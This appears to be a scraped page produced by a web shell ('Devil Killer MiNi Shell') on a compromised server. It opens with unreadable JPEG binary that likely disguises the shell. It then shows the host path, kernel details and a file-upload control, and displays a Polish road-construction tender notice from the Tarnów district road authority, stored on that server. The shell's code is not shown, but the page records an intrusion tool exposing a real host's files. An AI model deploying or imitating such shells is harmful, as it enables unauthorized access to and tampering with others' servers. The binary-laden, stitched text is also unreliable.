JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220530/0018401901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i przebudowa dróg wraz z rowami, przepustami i rekultywacjami w ramach zadania pn. &#34;Zagospodarowanie poscaleniowe w obrębie ewidencyjnym Stare Żukowice, gmina Lisia Góra&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZARZĄD DRÓG W TARNOWIE Z SIEDZIBĄ W ZGŁOBICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120384654</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zgłobicka 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgłobice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-113</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">14 674 12 30</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">14 674 12 31</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pzdtarnow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.malopolska.pl/pzdtszglobicach</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> drogi publiczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i przebudowa dróg wraz z rowami, przepustami i rekultywacjami w ramach zadania pn. &#34;Zagospodarowanie poscaleniowe w obrębie ewidencyjnym Stare Żukowice, gmina Lisia Góra&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f4b5af95-dd81-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00184019</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016332/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 2. Zagospodarowanie poscaleniowe obręb Stare Żukowice gmina Lisia Góra</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.malopolska.pl/pzdtszglobicach <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, <br/>wniosków, zawiadomień oraz przekazywanie informacji może się odbywać wyłącznie przy użyciu <br/>środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu <br/>usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), przy użyciu następujących narzędzi:<br/>1) miniPortalu - https://miniportal.uzp.gov.pl/ ,<br/>2) ePUAPu - https://epuap.gov.pl/wps/portal .<br/>3) poczty elektronicznej - adres e-mail: sekretariat@pzdtarnow.pl<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający <br/>i Wykonawcy posługują się numerem ogłoszenia lub znakiem postępowania: ZP.271.18.2022</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi <br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących <br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz <br/>do komunikacji”. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznych <br/>platform usług administracji publicznej (ePUAP). Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z miniPortalu, określone w Regulaminie korzystania z systemu miniPortal oraz zobowiązuje się, korzystając z miniPortalu, przestrzegać postanowień tego regulaminu. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji” wynosi 150 MB. Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. Zamawiający zaleca korzystanie z systemów miniPortal i ePUAP jedynie w zakresie w jakim jest to bezwzględnie wymagane zgodnie z niniejszą SWZ tzn. celem złożenia w postępowaniu oferty (i dokumentów przekazywanych wraz z nią) natomiast w pozostałym zakresie (tzn. przekazywania w postępowaniu pozostałych dokumentów, oświadczeń, zawiadomień, informacji) – Zamawiający rekomenduje korzystanie z poczty elektronicznej (adres email: sekretariat@pzdtarnow.pl ) UWAGA ! Forma komunikacji za pomocą poczty elektronicznej nie dotyczy złożenia oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.18.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Budowa i przebudowa dróg wraz z rowami, przepustami <br/>i rekultywacjami w ramach zadania pn. „Zagospodarowanie poscaleniowe w obrębie <br/>ewidencyjnym Stare Żukowice, gmina Lisia Góra.” W zakresie prac m.in.<br/>a) Roboty drogowe w tym: roboty przygotowawcze (wyznaczenie trasy i punktów sytuacyjno- wysokościowych w terenie, karczowanie drzew, krzaków i poszycia, zdjęcie warstwy humusu)<br/>roboty rozbiórkowe (rozbiórka nawierzchni z tłucznia, prefabrykowanych elementów <br/>betonowych, ogrodzeń z siatki, przepustów z rur żelbetowych, ścianek czołowych przepustów, <br/>roboty ziemne, odwodnienie korpusu drogowego, wykonanie podbudowy, wykonanie<br/>nawierzchni z kruszywa i betonu asfaltowego, roboty wykończeniowe (umocnienia skarp, <br/>rowów i ścieków, przepusty pod zjazdami i drogami, oczyszczenie rowów z namułu <br/>z profilowaniem skarp i dna rowu) urządzenia bezpieczeństwa ruchu (ustawienie ogrodzenia <br/>z siatki metalowej)<br/>b) Roboty rekultywacyjne w tym: roboty przygotowawcze w tym: wyznaczenie trasy i punktów <br/>sytuacyjno-wysokościowych w terenie, karczowanie drzew, krzaków i poszycia, zdjęcie warstwy <br/>humusu, roboty ziemne, odwodnienie korpusu drogowego, roboty wykończeniowe w tym:<br/>oczyszczanie rowów z namułu z profilowaniem skarp i dna rowu, nasadzenia drzew,<br/>c) Roboty zabezpieczające sieć elektryczną. <br/> Szczegółowy zakres robót precyzują kosztorysy ofertowe (3szt) dokumentacja projektowa oraz <br/>Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (STWiORB), stanowiące<br/>załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233292-2 - Instalowanie urządzeń ochronnych</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie <br/>dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki dotyczące zdolności technicznej lub zawodowej<br/> Na potwierdzenie spełniania warunku Wykonawcy ubiegający się o udzielenie zamówienia wykażą, <br/>że:<br/>a) wykonali nie wcześniej niż w okresie ostatnich 5* lat a jeżeli okres prowadzenia działalności <br/>jest krótszy – w tym okresie, co najmniej jedną robotę budowlaną polegające na budowie<br/>lub przebudowie lub rozbudowie lub remoncie drogi publicznej o wartości nie mniejszej <br/>niż: 1 000 000,00 zł brutto <br/>* okres wyrażony powyżej liczy się wstecz od dnia w którym upływa termin składania ofert.<br/>b) dysponują osobą, która będzie uczestniczyć w realizacji zamówienia i pełnić funkcję:<br/> Kierownika budowy - 1 osoba posiadająca uprawnienia do kierowania robotami <br/>budowlanymi w specjalności drogowej lub odpowiadające im uprawnienia budowlane <br/>wydane na podstawie wcześniej obowiązujących przepisów. Kierownik budowy powinien <br/>posiadać uprawnienia budowlane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane <br/>(tekst jednolity: Dz.U. z 2021 r., poz. 2351) oraz Rozporządzeniem Ministra Inwestycji <br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania <br/>samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz.831) lub <br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie <br/>wcześniej obowiązujących przepisów i posiadać doświadczenie zawodowe polegające na <br/>pełnieniu funkcji kierownika budowy lub kierownika robót w przynajmniej dwóch robotach<br/>budowlanych obejmujących budowę lub przebudowę lub rozbudowę lub remont dróg/drogi.<br/>W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji <br/>Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, <br/>z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również <br/>wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach <br/>określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych <br/>w państwach członkowskich Unii Europejskiej. (tekst jednolity: Dz. U. 2021 r., poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do <br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie <br/>konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył <br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo <br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o <br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej <br/>samej grupy kapitałowej – załącznik nr 9 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej <br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub <br/>ewidencji;<br/>3) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 ustawy <br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, <br/>zamiast dokumentów, o których mowa powyżej , składa dokument lub dokumenty <br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające <br/>odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym <br/>mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu <br/>składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób <br/>uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, <br/>administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze <br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują: <br/>1) wykaz robót budowlanych, zgodny z zamieszczonym wzorem - załącznik nr 6 do SWZ, <br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat* a jeżeli okres prowadzenia działalności <br/>jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania <br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów <br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o <br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz <br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od <br/>niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>*okres podany powyżej liczy się wstecz od dnia w którym upływa termin składania ofert<br/>2) wykaz osób, zgodny z zamieszczonym wzorem - załącznik nr 7 do SWZ, skierowanych przez <br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za <br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi <br/>osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz Ofertowy – zgodnie z załącznikiem nr 1 do SWZ Wraz <br/>z ofertą Wykonawca jest zobowiązany złożyć: <br/>1) kosztorysy ofertowe sporządzone wg wzoru stanowiącego – załącznik nr 8 (1-3) do SWZ tj.8/1, <br/>Roboty drogowe, 8/2 Roboty rekultywacyjne i 8/3 Roboty – zabezpieczenie sieci elektrycznej<br/>2) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je <br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu <br/>Oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy, <br/>Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotów <br/>udostępniających zasoby; w przypadku wskazania przez wykonawcę dostępności ww. <br/>dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz <br/>danych, zamawiający może żądać od wykonawcy przetłumaczenia na język polski pobranych <br/>samodzielnie przez zamawiającego dokumentów;<br/>3) oświadczenia, wymagane postanowieniami o których mowa w Rozdziale VIII pkt. 1, w Rozdziale <br/>IX pkt. 10, w Rozdziale X pkt. 2 SWZ; wg załącznika nr 2 i 3 do SWZ<br/>4) zobowiązanie i oświadczenie innego podmiotu, o których mowa w Rozdziale IX pkt. 3 i 4 SWZ <br/>(jeżeli dotyczy), w przypadku jeżeli Wykonawca polega na zdolnościach podmiotów <br/>udostepniających zasoby w celu potwierdzenia spełnienia warunków udziału w postępowaniu <br/>wraz z pełnomocnictwami, jeżeli prawo do podpisania danego zobowiązania nie wynika <br/>z dokumentów, o których mowa w pkt. 5 ppkt 2); wg załącznika nr 4 i 5 do SWZ<br/>5) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa <br/>w art. 117 ust. 4 ustawy Pzp; wg załącznika nr 11 do SWZ6) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli <br/>dotyczy); <br/>7) dowód wniesienia wadium w przypadku wniesienia wadium w innej formie niż w pieniądzu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 80 000,00 zł<br/> Słownie: osiemdziesiąt tysięcy złotych 00/100 Wadium wnosi się przed upływem terminu składania ofert.Wadium może być wnoszone w jednej lub w kilku następujących formach, o których mowa w art. <br/>97 ust. 7 ustawy Pzp: <br/>1) pieniądzu, <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019 r. poz.310, <br/>836 i 1572)<br/>3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego <br/>w Banku PEKAO S.A. numer: 92 1240 4748 1111 0000 4876 1705 w tytule wpisując numer <br/>postępowania z dopiskiem: Wadium. Zaleca się dołączenie do oferty dokumentu potwierdzającego <br/>dokonanie przelewu. Wadium winno być na koncie 